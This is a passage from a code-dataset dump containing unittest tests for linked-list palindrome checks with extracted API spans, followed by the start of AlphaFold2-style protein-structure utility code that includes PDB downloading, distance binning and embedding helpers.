code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from unittest import TestCase
from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse
class TestPalindromeSinglyLinkedList(TestCase):
def setUp(self):
self.pll = PalindromeSinglyLinkedList()
def tearDown(self):
self.pll = None
def test_empty_list(self):
with self.assertRaises(Empty):
self.pll.is_palindrome()
def test_single_element(self):
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
def test_two_elements(self):
self.pll.add(1)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
self.pll.remove(1)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
def test_more_than_two_elements_even(self):
self.pll.add(1)
self.pll.add(2)
self.pll.add(2)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
self.pll.remove(2)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
def test_more_than_two_elements_odd(self):
self.pll.add(1)
self.pll.add(2)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
self.pll.remove(2)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
class TestPalindromeBruteForce(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_empty_linked_list(self):
self.assertIsNone(is_palindrome_brute_force(None))
def test_single_element(self):
list = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_two_elements(self):
list = Node(1)
list.next = Node(2)
self.assertFalse(is_palindrome_brute_force(list))
list.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_odd_elements(self):
list = Node(1)
list.next = Node(2)
list.next.next = Node(2)
self.assertFalse(is_palindrome_brute_force(list))
list.next.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_even_elements(self):
list = Node(1)
list.next = Node(2)
list.next.next = Node(2)
list.next.next.next = Node(3)
self.assertFalse(is_palindrome_brute_force(list))
list.next.next.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
class TestPalindromeReverse(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_empty_node(self):
self.assertIsNone(is_palindrome_reverse(None))
def test_single_node(self):
self.assertTrue(is_palindrome_reverse(Node(1)))
def test_two_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
def test_odd_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
l_list.next.next = Node(3)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
def test_even_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
l_list.next = Node(2)
l_list.next = Node(3)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
| [
"CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node",
"CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force",
"CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.PalindromeSinglyLinkedList",
"CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse"
] | [((381, 409), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.PalindromeSinglyLinkedList', 'PalindromeSinglyLinkedList', ([], {}), '()\n', (407, 409), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((1752, 1759), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (1756, 1759), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1866, 1873), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (1870, 1873), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1894, 1901), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (1898, 1901), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1982, 1989), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (1986, 1989), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2096, 2103), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2100, 2103), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2124, 2131), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2128, 2131), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2157, 2164), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2161, 2164), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2250, 2257), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2254, 2257), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2366, 2373), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2370, 2373), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2394, 2401), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2398, 2401), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2427, 2434), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2431, 2434), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2465, 2472), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(3)'], {}), '(3)\n', (2469, 2472), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2563, 2570), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2567, 2570), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2967, 2974), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2971, 2974), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2997, 3004), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3001, 3004), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3085, 3092), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3089, 3092), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3196, 3203), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3200, 3203), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3226, 3233), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3230, 3233), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3261, 3268), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(3)'], {}), '(3)\n', (3265, 3268), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3354, 3361), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3358, 3361), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3467, 3474), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3471, 3474), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3497, 3504), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3501, 3504), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3527, 3534), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3531, 3534), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3557, 3564), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(3)'], {}), '(3)\n', (3561, 3564), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3649, 3656), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3653, 3656), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1668, 1699), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['None'], {}), '(None)\n', (1693, 1699), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((1784, 1815), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (1809, 1815), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((1928, 1959), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (1953, 1959), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2014, 2045), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2039, 2045), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2191, 2222), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2216, 2222), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2283, 2314), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2308, 2314), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2499, 2530), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2524, 2530), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2596, 2627), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2621, 2627), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2801, 2828), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['None'], {}), '(None)\n', (2822, 2828), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3031, 3060), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3052, 3060), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3117, 3146), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3138, 3146), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3295, 3324), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3316, 3324), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3387, 3416), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3408, 3416), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3590, 3619), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3611, 3619), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3682, 3711), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3703, 3711), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((2909, 2916), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2913, 2916), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n')] |
# utils for working with 3d-protein structures
import os
import numpy as np
import torch
from functools import wraps
from einops import rearrange, repeat
# import torch_sparse # only needed for sparse nth_deg adj calculation
# bio
from Bio import SeqIO
import itertools
import string
# sidechainnet
from sidechainnet.utils.sequence import ProteinVocabulary, ONE_TO_THREE_LETTER_MAP
from sidechainnet.utils.measure import GLOBAL_PAD_CHAR
from sidechainnet.structure.build_info import NUM_COORDS_PER_RES, BB_BUILD_INFO, SC_BUILD_INFO
from sidechainnet.structure.StructureBuilder import _get_residue_build_iter
# build vocabulary
VOCAB = ProteinVocabulary()
# constants
import alphafold2_pytorch.constants as constants
# helpers
def exists(val):
return val is not None
# constants: same as in alphafold2.py
DISTANCE_THRESHOLDS = torch.linspace(2, 20, steps = constants.DISTOGRAM_BUCKETS)
# distance binning function
def get_bucketed_distance_matrix(coords, mask, num_buckets = constants.DISTOGRAM_BUCKETS, ignore_index = -100):
distances = torch.cdist(coords, coords, p=2)
boundaries = torch.linspace(2, 20, steps = num_buckets, device = coords.device)
discretized_distances = torch.bucketize(distances, boundaries[:-1])
discretized_distances.masked_fill_(~(mask[..., None] & mask[..., None, :]), ignore_index)
return discretized_distances
# decorators
def set_backend_kwarg(fn):
@wraps(fn)
def inner(*args, backend = 'auto', **kwargs):
if backend == 'auto':
backend = 'torch' if isinstance(args[0], torch.Tensor) else 'numpy'
kwargs.update(backend = backend)
return fn(*args, **kwargs)
return inner
def expand_dims_to(t, length = 3):
if length == 0:
return t
return t.reshape(*((1,) * length), *t.shape) # will work with both torch and numpy
def expand_arg_dims(dim_len = 3):
""" pack here for reuse.
turns input into (B x D x N)
"""
def outer(fn):
@wraps(fn)
def inner(x, y, **kwargs):
assert len(x.shape) == len(y.shape), "Shapes of A and B must match."
remaining_len = dim_len - len(x.shape)
x = expand_dims_to(x, length = remaining_len)
y = expand_dims_to(y, length = remaining_len)
return fn(x, y, **kwargs)
return inner
return outer
def invoke_torch_or_numpy(torch_fn, numpy_fn):
def outer(fn):
@wraps(fn)
def inner(*args, **kwargs):
backend = kwargs.pop('backend')
passed_args = fn(*args, **kwargs)
passed_args = list(passed_args)
if isinstance(passed_args[-1], dict):
passed_kwargs = passed_args.pop()
else:
passed_kwargs = {}
backend_fn = torch_fn if backend == 'torch' else numpy_fn
return backend_fn(*passed_args, **passed_kwargs)
return inner
return outer
# preprocess data
def get_atom_ids_dict():
""" Get's a dict mapping each atom to a token. """
ids = set(["", "N", "CA", "C", "O"])
for k,v in SC_BUILD_INFO.items():
for name in v["atom-names"]:
ids.add(name)
return {k: i for i,k in enumerate(sorted(ids))}
def make_cloud_mask(aa):
""" relevent points will be 1. paddings will be 0. """
mask = np.zeros(14)
# early stop if padding token
if aa == "_":
return mask
# get num of atoms in aa
n_atoms = 4+len( SC_BUILD_INFO[ ONE_TO_THREE_LETTER_MAP[aa] ]["atom-names"] )
mask[:n_atoms] = 1
return mask
def make_atom_id_embedds(aa, atom_ids):
""" Return the tokens for each atom in the aa. """
mask = np.zeros(14)
# early stop if padding token
if aa == "_":
return mask
# get atom id
atom_list = ["N", "CA", "C", "O"] + SC_BUILD_INFO[ ONE_TO_THREE_LETTER_MAP[aa] ]["atom-names"]
for i,atom in enumerate(atom_list):
mask[i] = ATOM_IDS[atom]
return mask
ATOM_IDS = get_atom_ids_dict()
CUSTOM_INFO = {k: {"cloud_mask": make_cloud_mask(k),
"atom_id_embedd": make_atom_id_embedds(k, atom_ids=ATOM_IDS),
} for k in "ARNDCQEGHILKMFPSTWYV_"}
# common utils
# parsing to pdb for easier visualization - other example from sidechainnet is:
# https://github.com/jonathanking/sidechainnet/tree/master/sidechainnet/structure
def download_pdb(name, route):
""" Downloads a PDB entry from the RCSB PDB.
Inputs:
* name: str. the PDB entry id. 4 characters, capitalized.
* route: str. route of the destin file. usually ".pdb" extension
Output: route of destin file
"""
os.system(f"curl https://files.rcsb.org/download/{name}.pdb > {route}")
return route
def clean_pdb(name, route=None, chain_num=None):
""" Cleans the structure to only leave the important part.
Inputs:
* name: str. route of the input .pdb file
* route: str. route of the output. will overwrite input if not provided
* chain_num: int. index of chain to select (1-indexed as pdb files)
Output: route of destin file.
"""
import mdtraj
destin = route if route is not None else name
# read input
raw_prot = mdtraj.load_pdb(name)
# iterate over prot and select the specified chains
idxs = []
for chain in raw_prot.topology.chains:
# if arg passed, only select that chain
if chain_num is not None:
if chain_num != chain.index:
continue
# select indexes of chain
chain_idxs = raw_prot.topology.select(f"chainid == {str(chain.index)}")
idxs.extend( chain_idxs.tolist() )
# sort: topology and xyz selection are ordered
idxs = sorted(idxs)
# get new trajectory from the sleected subset of indexes and save
prot = mdtraj.Trajectory(xyz=raw_prot.xyz[:, idxs],
topology=raw_prot.topology.subset(idxs))
prot.save(destin)
return destin
def custom2pdb(coords, proteinnet_id, route):
""" Takes a custom representation and turns into a .pdb file.
Inputs:
* coords: array/tensor of shape (3 x N) or (N x 3). in Angstroms.
same order as in the proteinnnet is assumed (same as raw pdb file)
* proteinnet_id: str. proteinnet id format (<class>#<pdb_id>_<chain_number>_<chain_id>)
see: https://github.com/aqlaboratory/proteinnet/
* route: str. destin route.
Output: tuple of routes: (original, generated) for the structures.
"""
import mdtraj
# convert to numpy
if isinstance(coords, torch.Tensor):
coords = coords.detach().cpu().numpy()
# ensure (1, N, 3)
if coords.shape[1] == 3:
coords = coords.T
coords = np.newaxis(coords, axis=0)
# get pdb id and chain num
pdb_name, chain_num = proteinnet_id.split("#")[-1].split("_")[:-1]
pdb_destin = "/".join(route.split("/")[:-1])+"/"+pdb_name+".pdb"
# download pdb file and select appropiate
download_pdb(pdb_name, pdb_destin)
clean_pdb(pdb_destin, chain_num=chain_num)
# load trajectory scaffold and replace coordinates - assumes same order
scaffold = mdtraj.load_pdb(pdb_destin)
scaffold.xyz = coords
scaffold.save(route)
return pdb_destin, route
def coords2pdb(seq, coords, cloud_mask, prefix="", name="af2_struct.pdb"):
""" Turns coordinates into PDB files ready to be visualized.
Inputs:
* seq: (L,) tensor of ints (sidechainnet aa-key pairs)
* coords: (3, N) coords of atoms
* cloud_mask: (L, C) boolean mask of occupied spaces in scn format
* prefix: str. directory to save files.
* name: str. name of destin file (ex: pred1.pdb)
"""
scaffold = torch.zeros( cloud_mask.shape, 3 )
scaffold[cloud_mask] = coords.cpu().float()
# build structures and save
pred = scn.StructureBuilder( seq, crd=scaffold )
pred.to_pdb(prefix+name)
# adapted from https://github.com/facebookresearch/esm
def remove_insertions(sequence: str) -> str:
""" Removes any insertions into the sequence. Needed to load aligned sequences in an MSA. """
deletekeys = dict.fromkeys(string.ascii_lowercase)
deletekeys["."] = None
deletekeys["*"] = None
translation = str.maketrans(deletekeys)
return sequence.translate(translation)
def read_msa(filename: str, nseq: int):
""" Reads the first nseq sequences from an MSA file, automatically removes insertions."""
return [(record.description, remove_insertions(str(record.seq)))
for record in itertools.islice(SeqIO.parse(filename, "fasta"), nseq)]
# sidechainnet / MSA / other data utils
def ids_to_embed_input(x):
""" Returns the amino acid string input for calculating the ESM and MSA transformer embeddings
Inputs:
* x: any deeply nested list of integers that correspond with amino acid id
"""
assert isinstance(x, list), 'input must be a list'
id2aa = VOCAB._int2char
out = []
for el in x:
if isinstance(el, list):
out.append(ids_to_embed_input(el))
elif isinstance(el, int):
out.append(id2aa[el])
else:
raise TypeError('type must be either list or character')
if all(map(lambda c: isinstance(c, str), out)):
return (None, ''.join(out))
return out
def get_msa_embedd(msa, embedd_model, batch_converter, device = None):
""" Returns the MSA_tr embeddings for a protein.
Inputs:
* seq: ( (b,) L,) tensor of ints (in sidechainnet int-char convention)
* embedd_model: MSA_tr model (see train_end2end.py for an example)
* batch_converter: MSA_tr batch converter (see train_end2end.py for an example)
Outputs: tensor of (batch, n_seqs, L, embedd_dim)
* n_seqs: number of sequences in the MSA
* embedd_dim: number of embedding dimensions. 768 for MSA_Transformer
"""
# use MSA transformer
REPR_LAYER_NUM = 12
device = embedd_model.device
max_seq_len = msa.shape[-1]
embedd_inputs = ids_to_embed_input(msa.cpu().tolist())
msa_batch_labels, msa_batch_strs, msa_batch_tokens = batch_converter(embedd_inputs)
with torch.no_grad():
results = embedd_model(msa_batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
# index 0 is for start token. so take from 1 one
token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :]
return token_reps
def get_esm_embedd(seq, embedd_model, batch_converter, msa_data=None):
""" Returns the ESM embeddings for a protein.
Inputs:
* seq: ( (b,) L,) tensor of ints (in sidechainnet int-char convention)
* embedd_model: ESM model (see train_end2end.py for an example)
* batch_converter: ESM batch converter (see train_end2end.py for an example)
Outputs: tensor of (batch, n_seqs, L, embedd_dim)
* n_seqs: number of sequences in the MSA. 1 for ESM-1b
* embedd_dim: number of embedding dimensions. 1280 for ESM-1b
"""
# use ESM transformer
device = embedd_model.device
REPR_LAYER_NUM = 33
max_seq_len = seq.shape[-1]
embedd_inputs = ids_to_embed_input(seq.cpu().tolist())
batch_labels, batch_strs, batch_tokens = batch_converter(embedd_inputs)
with torch.no_grad():
results = embedd_model(batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
# index 0 is for start token. so take from 1 one
token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :].unsqueeze(dim=1)
return token_reps
def get_all_protein_ids(dataloader, verbose=False):
""" Given a sidechainnet dataloader for a CASP version,
Returns all the ids belonging to proteins.
Inputs:
* dataloader: a sidechainnet dataloader for a CASP version
Outputs: a set containing the ids for all protein entries.
"""
# store ids here
ids = set([])
# iterate for all batches
for i,batch in tqdm(enumerate(dataloaders['train'])):
# for breaking from 2 loops at once
try:
for i in range(batch.int_seqs.shape[0]):
# check if all fragments are : 4_LETTER_PDB + NUM + CHAIN
max_len_10 = len(batch.pids[i]) < 10
fragments = [len(x) <= 4 for x in batch.pids[i].split("_")]
fragments_under_4 = sum(fragments) == len(fragments) # AND CONDITION
# record id
if max_len_10 and fragments_under_4:
ids.add(batch.pids[i])
else:
if verbose:
print("skip:", batch.pids[i], "under 4", fragments)
except StopIteration:
break
# returns set of ids
return ids
def scn_cloud_mask(scn_seq, boolean=True, coords=None):
""" Gets the boolean mask atom positions (not all aas have same atoms).
Inputs:
* scn_seq: (batch, length) sequence as provided by Sidechainnet package
* boolean: whether to return as array of idxs or boolean values
* coords: optional .(batch, lc, 3). sidechainnet coords.
returns the true mask (solves potential atoms that might not be provided)
Outputs: (batch, length, NUM_COORDS_PER_RES) boolean mask
"""
scn_seq = expand_dims_to(scn_seq, 2 - len(scn_seq.shape))
# early check for coords mask
if coords is not None:
batch_mask = ( rearrange(coords, '... (l c) d -> ... l c d', c=14) == 0 ).sum(dim=-1) < coords.shape[-1]
if boolean:
return batch_mask.bool()
else:
return batch_mask.nonzero()
# do loop in cpu
device = scn_seq.device
batch_mask = []
scn_seq = scn_seq.cpu().tolist()
for i, seq in enumerate(scn_seq):
# get masks for each prot (points for each aa)
batch_mask.append( torch.tensor([CUSTOM_INFO[VOCAB.int2char(aa)]['cloud_mask'] \
for aa in seq]).bool().to(device).unsqueeze(0) )
# concat in last dim
batch_mask = torch.cat(batch_mask, dim=0)
# return mask (boolean or indexes)
if boolean:
return batch_mask.bool()
else:
return batch_mask.nonzero()
def scn_backbone_mask(scn_seq, boolean=True, n_aa=3):
""" Gets the boolean mask for N and CA positions.
Inputs:
* scn_seq: sequence(s) as provided by Sidechainnet package (int tensor/s)
* n_aa: number of atoms in a backbone. (may include cbeta as 4th pos)
* bool: whether to return as array of idxs or boolean values
Outputs: (N_mask, CA_mask, C_mask)
"""
wrapper = torch.zeros(*scn_seq.shape, n_aa).to(scn_seq.device)
# N is the first atom in every AA. CA is the 2nd.
wrapper[..., 0] = 1
wrapper[..., 1] = 2
wrapper[..., 2] = 3
wrapper = rearrange(wrapper, '... l c -> ... (l c)')
# find idxs
N_mask = wrapper == 1
CA_mask = wrapper == 2
C_mask = wrapper == 3
if boolean:
return N_mask, CA_mask, C_mask
return torch.nonzero(N_mask), torch.nonzero(CA_mask), torch.nonzero(C_mask)
def scn_atom_embedd(scn_seq):
""" Returns the token for each atom in the aa.
Inputs:
* scn_seq: sequence(s) as provided by Sidechainnet package (int tensor/s)
"""
device = scn_seq.device
batch_tokens = []
# do loop in cpu
scn_seq = scn_seq.cpu()
for i,seq in enumerate(scn_seq):
batch_tokens.append( torch.tensor([CUSTOM_INFO[VOCAB.int2char(aa.item())]["atom_id_embedd"] \
for aa in seq]).long().to(device).unsqueeze(0) )
batch_tokens = torch.cat(batch_tokens, dim=0)
return batch_tokens
def nth_deg_adjacency(adj_mat, n=1, sparse=False):
""" Calculates the n-th degree adjacency matrix.
Performs mm of adj_mat and adds the newly added.
Default is dense. Mods for sparse version are done when needed.
Inputs:
* adj_mat: (N, N) adjacency tensor
* n: int. degree of the output adjacency
* sparse: bool. whether to use torch-sparse module
Outputs:
* edge_idxs: ij positions of the adjacency matrix
* edge_attrs: degree of connectivity (1 for neighs, 2 for neighs^2, ... )
"""
adj_mat = adj_mat.float()
attr_mat = torch.zeros_like(adj_mat)
new_adj_mat = adj_mat.clone()
for i in range(n):
if i == 0:
attr_mat += adj_mat
continue
if i == 1 and sparse:
idxs = adj_mat.nonzero().t()
vals = adj_mat[idxs[0], idxs[1]]
new_idxs = idxs.clone()
new_vals = vals.clone()
m, k, n = 3 * [adj_mat.shape[0]] # (m, n) * (n, k) , but adj_mats are squared: m=n=k
if sparse:
new_idxs, new_vals = torch_sparse.spspmm(new_idxs, new_vals, idxs, vals, m=m, k=k, n=n)
new_vals = new_vals.bool().float()
new_adj_mat = torch.zeros_like(attr_mat)
new_adj_mat[new_idxs[0], new_idxs[1]] = new_vals
# sparse to dense is slower
# torch.sparse.FloatTensor(idxs, vals).to_dense()
else:
new_adj_mat = (new_adj_mat @ adj_mat).bool().float()
attr_mat.masked_fill( (new_adj_mat - attr_mat.bool().float()).bool(), i+1 )
return new_adj_mat, attr_mat
def prot_covalent_bond(seqs, adj_degree=1, cloud_mask=None, mat=True):
""" Returns the idxs of covalent bonds for a protein.
Inputs
* seq: (b, n) torch long.
* adj_degree: int. adjacency degree
* cloud_mask: mask selecting the present atoms.
* mat: whether to return as indexes or matrices.
for indexes, only 1 seq is supported
Outputs: edge_idxs, edge_attrs
"""
device = seqs.device
# get starting poses for every aa
adj_mat = torch.zeros(seqs.shape[0], seqs.shape[1]*14, seqs.shape[1]*14)
# not needed to device since it's only for indices.
scaff = torch.zeros(seqs.shape[1], 14)
scaff[:, 0] = 1
idxs = torch.nonzero(scaff).reshape(-1)
for s,seq in enumerate(seqs):
for i,idx in enumerate(idxs):
if i >= seq.shape[0]:
break
# offset by pos in chain ( intra-aa bonds + with next aa )
bonds = idx + torch.tensor( constants.AA_DATA[VOCAB.int2char(seq[i].item())]['bonds'] + [[2, 14]] ).t()
# delete link with next if final AA in seq
if i == idxs.shape[0]-1:
